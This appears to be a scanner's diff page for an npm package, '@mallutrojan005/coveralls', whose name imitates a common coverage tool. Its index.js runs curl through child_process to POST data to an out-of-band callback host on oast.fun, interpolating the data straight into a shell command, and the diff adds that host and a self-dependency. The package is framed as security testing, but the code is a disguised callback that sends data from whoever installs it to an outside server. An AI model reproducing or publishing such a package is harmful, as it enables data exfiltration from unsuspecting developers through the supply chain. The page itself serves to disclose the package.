@mallutrojan005/coveralls 0.1.0 → 2.1.0
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +3 -1
package/index.js
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
const { exec } = require("child_process");
|
2
2
|
|
3
3
|
function sendPingback(data) {
|
4
|
-
const collaboratorUrl = "https://
|
4
|
+
const collaboratorUrl = "https://usbbcjkkyavkeqhiqzrdav0wevvl0uhko.oast.fun";
|
5
5
|
exec(`curl -X POST -d "${data}" ${collaboratorUrl}`, (error, stdout, stderr) => {
|
6
6
|
if (error) {
|
7
7
|
console.error(`Error: ${error.message}`);
|
package/package.json
CHANGED
@@ -2,7 +2,7 @@
|
|
2
2
|
|
3
3
|
"name": "@mallutrojan005/coveralls",
|
4
4
|
|
5
|
-
"version": "
|
5
|
+
"version": "2.1.0",
|
6
6
|
|
7
7
|
"description": "A simple package to trigger Burp Collaborator for security testing",
|
8
8
|
|
@@ -16,6 +16,8 @@
|
|
16
16
|
|
17
17
|
"dependencies": {
|
18
18
|
|
19
|
+
"@mallutrojan005/coveralls": "^0.1.0",
|
20
|
+
|
19
21
|
"assistants-nextjs": "^9.0.0"
|
20
22
|
|
21
23
|
}
|